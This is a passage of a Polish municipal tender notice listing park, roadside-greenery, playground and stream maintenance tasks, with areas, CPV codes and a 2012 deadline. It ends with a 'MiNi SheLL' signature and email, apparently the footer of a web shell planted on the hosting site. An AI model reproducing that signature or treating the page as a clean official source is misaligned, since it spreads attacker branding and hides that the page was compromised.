a) oczyszczanie  powierzchniowe,
b) zamiatanie  placów, schodów i murków,
c) sprzątaniu liści,
d) usuwanie skutków zdarzeń losowych,
e) mycie ławek parkowych,
f) kontrolowanie sprawności  wszystkich sieci  oraz  latarni  znajdujących się na terenie parku,
g) zasypywanie  dołów  wykopanych  przez  psy oraz powstałe z innych przyczyn,
h) utrzymanie cieków wodnych oraz zbiorników rumoszowych,
i) utrzymanie w czystości nawierzchni tarasu - o powierzchni 1197m2,
j) utrzymanie ścieżek żwirowych - o powierzchni 8035 m2,
k) chemiczne  odchwaszczanie  nawierzchni  dróg  i  placów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.31.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie i konserwacja terenów zieleni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)   Pielęgnacja i utrzymanie skwerów i zieleni znajdującej się w pasie drogowym na powierzchni 25.106 m2,
b) Pielęgnacja i utrzymanie parku w Czerniawie na powierzchni 4.4675 ha,
c) Pielęgnacja i utrzymanie sześciu placów zabaw  na powierzchni 19.667  m2,
I.   UTRZYMANIE SKWERÓW I ZIELENI ZNAJDUJĄCEJ SIĘ W PASIE DROGOWYM,
1. UTRZYMANIE ZIELENI,
1.1  Pielęgnacja i utrzymanie istniejących kwietników, rabat bylinowych lub mieszanych,
1.2 Pielęgnacja krzewów i żywopłotów,
1.3 Bieżące wykaszanie poboczy,
1.4 Wycinka samosiewów drzew nie starszych niż 10 lat,
1.5 Utrzymanie trawników zgodnie ze sztuką ogrodniczą,
2. STAŁE UTRZYMANIE PORZĄDKU z uwzglednieniem w szczególności prac porządkowych: 
a) oczyszczanie  powierzchniowe ,
b) sprzątaniu liści,
c) usuwanie skutków zdarzeń losowych,
d) mycie ławek parkowych,
e) kontrolowanie sprawności wszystkich sieci  oraz  latarni,
f) zasypywanie  dołów  wykopanych  przez  psy oraz powstałe z innych przyczyn,
g) utrzymanie ścieżek żwirowych - o powierzchni 461m2,
II. UTRZYMANIE  I KONSERWACJA PARKU W CZERNIAWIE ,

1. UTRZYMANIE ZIELENI

1.1 Utrzymanie powierzchni trawiastych,
1.2 Wycinka samosiewów drzew nie starszych niż 10 lat,
2. UTRZYMANIE PORZĄDKU
a) oczyszczanie  powierzchniowe ,
b) sprzątaniu liści,
c) usuwanie skutków zdarzeń losowych,
d) mycie ławek parkowych,
e) kontrolowanie sprawności wszystkich sieci  oraz  latarni,
f) zasypywanie  dołów  wykopanych  przez  psy oraz powstałe z innych przyczyn,
g) utrzymanie ścieżek żwirowych - o powierzchni 872m2,
2.2 Sprzątanie liści.
III. UTRZYMANIE PLACÓW ZABAW:
1. Plac zabaw przy skrzyżowaniu ulic Parkowej i Wyszyńskiego o powierzchni 5764m2,
2. Plac zabaw przy ulicy Bocznej o powierzchni 3329 m2,
3. Mini golf przy ulicy Krótkiej o powierzchni 6330 m2,
4. Plac zabaw przy ulicy Chrobrego o powierzchni 1378 m2.
5. Plac zabaw między ulicą Młodych Techników a Budowlanych 1200  m2
6. Plac zabaw między ulicą Sanatoryjną a Izerską (w Czerniawie) na terenie działki nr 31/4 am 2 Obr II  o   powierzchni 1 666 m2.
1. UTRZYMANIE ZIELENI,
1.1  Pielęgnacja i utrzymanie istniejących kwietników, rabat bylinowych lub mieszanych,
1.2 Pielęgnacja krzewów i żywopłotów,
1.4 Wycinka samosiewów drzew nie starszych niż 10 lat,
1.5 Utrzymanie trawników zgodnie ze sztuką ogrodniczą,
2. STAŁE UTRZYMANIE PORZĄDKU z uwzglednieniem w szczególności prac porządkowych: 
a) oczyszczanie  powierzchniowe ,
b) sprzątaniu liści,
c) usuwanie skutków zdarzeń losowych,
d) mycie ławek parkowych,
e) kontrolowanie sprawności wszystkich sieci  oraz  latarni,
f) zasypywanie  dołów  wykopanych  przez  psy oraz powstałe z innych przyczyn,
g) Wymiana i zakup piasku -białego- w piaskownicach - trzykrotnie w trakcie trwania umowy (w miesiącach: kwiecień, lipiec, wrzesień),
III. PRACE DODATKOWE OBJĘTE ZAMÓWIENIEM:
1. Wykaszanie traw wokół przystanków na powierzchni 8 m x 3 m = 24 m2 każdy wraz      w wywozem zebranej trawy w miejsce wskazane przez Zamawiającego na odległość nie więksż niż 10 km od siedziby Zamawiającego. 
Zakres prac obejmuje przystanki:
a) dworzec PKS przy ul. Kardynała Stefana Wyszyńskiego,
b) przystanki PKS przy ul. Grunwaldzkiej - 2 szt,
c) przystanek PKS przy ul. Lwóweckiej, 
d) przystanek PKS przy ul. Sanatoryjnej, 
e) przystanek PKS przy ul. Izerskiej,
f) przystanek PKS przy ul.  Sudeckiej

2. Utrzymanie czystości potoków Santa Maria i Mirotka znajdującego się na terenie administracyjnym gminy - zbieranie nieczystości, dwukrotne wykaszanie samosiewów w ciągu trwania umowy w terminie określonych przez Zamawiającego. Dotyczy również pasa terenu przyległego do linii brzegowej o szerokości 5 m z obu stron, będącego w zarządzie Zamawiającego.

3. Wykonanie obsadzeń oraz pielęgnacja konstrukcji kwietnikowych tzw wież kwiatowych usytuowanych na terenie miasta wg wskazań Zamawiającego - (14 sztuk) z materiału nasadzeniowego kupionego przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.31.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com